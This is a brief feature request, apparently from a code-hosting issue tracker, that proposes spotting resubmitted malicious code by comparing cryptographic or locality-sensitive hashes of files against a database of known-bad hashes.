feature: automatically identify code removed previously for being malicious.

Question

Opened this issue a year ago · 0 comments

A couple ideas for approaching this (just spitballing, possible better solutions exist as well):

taking a cryptographic hash of a file (language agnostic but inflexible to minor code changes)
computing a locality-sensitive hash of the malicious file using opcode disassembly or AST features (python-specific)
- the similarity of another file to a known malicious hash could be taken using the Levinshtein distance of the hash of a file with a known malicious file's hash.

This would obviously require a database of some sort (and committing thereto malicious file hashes in response to reports).